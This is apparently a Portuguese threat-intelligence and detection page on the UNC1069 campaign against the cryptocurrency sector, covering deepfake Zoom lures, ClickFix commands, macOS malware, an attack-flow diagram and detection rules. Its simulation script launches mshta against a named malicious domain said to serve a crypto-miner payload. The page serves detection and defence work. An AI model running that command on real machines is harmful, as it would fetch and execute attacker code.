UNC1069 Mira o Setor de Criptomoeda com Novas Ferramentas e Engenharia Social Habilitada por IA
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Relacionado à Coreia do Norte, o grupo UNC1069 atacou uma FinTech de criptomoedas usando uma intrusão em várias etapas que combinou vídeo deepfake gerado por IA, contas Telegram comprometidas e uma reunião Zoom falsa para levar as vítimas a executar comandos maliciosos.
Investigação
A Mandiant identificou sete famílias de malware em um host macOS, incluindo os recém-observados SILENCELIFT, DEEPBREATH e CHROMEPUSH, além do carregador conhecido SUGARLOADER. A cadeia começou com um comando estilo ClickFix que buscou uma carga útil de um domínio malicioso, e então passou por carregadores e backdoors que roubaram credenciais, dados do navegador e conteúdo de mensagens. Estágios posteriores utilizaram execução modular, residente em memória, para minimizar rastros em disco.
Mitigação
Fortaleça a verificação através de canais de engenharia social, restrinja a execução de scripts não assinados e monitore o uso anômalo de curl ou mshta. No macOS, aplique controles de assinatura de código e de launch-daemon, e audite permissões TCC e diretórios de hosts de mensagens nativas para arquivos desconhecidos.
Resposta
Isole o endpoint, preserve artefatos de linha de comando, recupere o plist do launch-daemon malicioso e bloqueie todos os domínios C2 identificados. Redefina credenciais do chaveiro, navegador e Telegram, e complete uma varredura por carregadores residuais. Revise contas afetadas para acesso não autorizado e coordene a contenção.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>Ação</b> – <b>T1204.001 Execução do Usuário</b>: Link malicioso entregue via conta comprometida do Telegram e reunião Zoom falsificada<br/><b>Descrição</b>: A vítima copiou e executou strings de comando"] class action_initial_access action tool_telegram["<b>Ferramenta</b> – <b>Nome</b>: Telegram (comprometido)<br/><b>Função</b>: Canal de entrega para link malicioso"] class tool_telegram tool tool_zoom["<b>Ferramenta</b> – <b>Nome</b>: Zoom (reunião falsificada)<br/><b>Função</b>: Vetor de engenharia social"] class tool_zoom tool action_execution_unix_shell["<b>Ação</b> – <b>T1059.004 Shell Unix</b>: Execute o comando curl via zsh para baixar WAVESHAPER<br/><b>Descrição</b>: Baixa e executa backdoor"] class action_execution_unix_shell action tool_curl["<b>Ferramenta</b> – <b>Nome</b>: curl<br/><b>Propósito</b>: Recuperar carga útil remota"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Nome</b>: WAVESHAPER<br/><b>Função</b>: Backdoor baixado e executado"] class malware_waveshaper malware action_execution_mshta["<b>Ação</b> – <b>T1218.005 Execução Proxy Mshta</b>: Use mshta para recuperar e executar o downloader HYPERCALL"] class action_execution_mshta action tool_mshta["<b>Ferramenta</b> – <b>Nome</b>: mshta<br/><b>Propósito</b>: Executar aplicação HTML remota"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Nome</b>: HYPERCALL<br/><b>Função</b>: Downloader executado via mshta"] class malware_hypercall malware process_launch_daemon["<b>Processo</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>Propósito</b>: Executa SUGARLOADER na inicialização do sistema"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Nome</b>: SUGARLOADER<br/><b>Função</b>: Componente persistente"] class malware_sugarloader malware action_defense_evasion["<b>Ação</b> – <b>T1027.004 Compilação Após Entrega</b>: Criptografe configuração com RC4 para ocultar URLs C2"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Nome</b>: DEEPBREATH<br/><b>Capacidades</b>: Acesso a Keychain e armazenamentos de navegador"] class malware_deepbreath malware action_cred_keychain["<b>Ação</b> – <b>T1555.001 Keychain</b>: Extraia credenciais do Keychain do macOS"] class action_cred_keychain action action_cred_browser["<b>Ação</b> – <b>T1555.003 Navegadores Web</b>: Extraia cookies, logins, extensões do Chrome Brave Edge"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Nome</b>: CHROMEPUSH<br/><b>Capacidade</b>: Keylogger de extensão de navegador"] class malware_chromepush malware action_keylogging["<b>Ação</b> – <b>T1056.001 Keylogging</b>: Capturar pressionamentos de tecla via extensão maliciosa"] class action_keylogging action action_local_staging["<b>Ação</b> – <b>T1074.001 Estágio de Dados Locais</b>: Armazene dados coletados em diretórios temporários"] class action_local_staging action action_remote_staging["<b>Ação</b> – <b>T1074.002 Estágio de Dados Remotos</b>: Carregue dados preparados para C2 usando curl"] class action_remote_staging action action_c2_http["<b>Ação</b> – <b>T1102.003 Serviço Web One-Way</b>: Envie dados exfiltrados via HTTP POST"] class action_c2_http action action_exfiltration["<b>Ação</b> – <b>T1020 Exfiltração Automatizada</b>: Carregamento automatizado de dados para servidores C2"] class action_exfiltration action %% Connections action_initial_access –>|utiliza| tool_telegram tool_telegram –>|entrega link para| tool_zoom tool_zoom –>|leva a| action_execution_unix_shell action_execution_unix_shell –>|executa| tool_curl tool_curl –>|baixa| malware_waveshaper malware_waveshaper –>|dispara| action_defense_evasion action_initial_access –>|também dispara| action_execution_mshta action_execution_mshta –>|utiliza| tool_mshta tool_mshta –>|recupera| malware_hypercall malware_hypercall –>|instala| process_launch_daemon process_launch_daemon –>|inicia| malware_sugarloader malware_sugarloader –>|carrega| malware_deepbreath malware_deepbreath –>|executa| action_cred_keychain malware_deepbreath –>|executa| action_cred_browser malware_deepbreath –>|instala| malware_chromepush malware_chromepush –>|executa| action_keylogging action_keylogging –>|armazena dados em| action_local_staging action_local_staging –>|carrega via curl para| action_remote_staging action_remote_staging –>|envia dados para| action_c2_http action_c2_http –>|facilita| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
Fluxo de Ataque
Detecções
Possível Tentativa de Enumeração System_profiler (via processo_criação)
Ver
Comportamento Suspeito de Evasão de Defesa MSHTA LOLBAS pela Detecção de Comandos Associados (via processo_criação)
Ver
Possível Tentativa de Enumeração de Atualizações do Sistema (via processo_criação)
Ver
Tentativa de Execução Suspeita de Curl [MacOS] (via linha de comando)
Ver
PnPtUtil para Enumeração de Dispositivos (via linha de comando)
Ver
Possível Enumeração de Sistema (via linha de comando)
Ver
IOCs (HashMd5) para detectar: UNC1069 Alvo no Setor de Criptomoeda com Novas Ferramentas e Engenharia Social Habilitada por IA
Ver
IOCs (HashSha256) para detectar: UNC1069 Alvo no Setor de Criptomoeda com Novas Ferramentas e Engenharia Social Habilitada por IA
Ver
Vetor de Infecção MacOS de UNC1069 via ClickFix [Criação de Processo Linux]
Ver
Execução do Comando de Ataque ClickFix de UNC1069 [Criação de Processo Windows]
Ver
Execução de Simulação
Pré-requisito: A verificação prévia de Telemetria & Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos do Ataque:
O adversário, após obter acesso inicial via um email de phishing, utilizamshtapara buscar uma Aplicação HTML maliciosa dehttps://mylingocoin.com/audio/fix/6454694440. Este arquivo HTA contém uma carga útil do PowerShell que instala um minerador de criptomoedas. Antes de lançar o HTA, o atacante executasetx audio_volume 100para garantir que o subsistema de áudio esteja em um estado conhecido (algumas variantes da campanha ClickFix manipulam configurações de áudio para ocultar pop-ups). Ambos os comandos são executados diretamente em um console PowerShell, produzindo campos CommandLine que correspondem exatamente à regra Sigma. -
Script de Teste de Regressão:
# Simulação de Ataque ClickFix de UNC1069 – aciona regra Sigma # Etapa 1: Persista uma variável de ambiente com aparência inofensiva (corresponde à detecção) setx audio_volume 100 # Etapa 2: Execute HTA malicioso – URL exato usado na detecção da regra $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # Opcional: aguarde alguns segundos para o HTA iniciar Start-Sleep -Seconds 5 -
Comandos de Limpeza:
# Remova a variável de ambiente definida anteriormente reg delete "HKCUEnvironment" /v "audio_volume" /f # Termine quaisquer processos mshta restantes gerados pelo teste Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force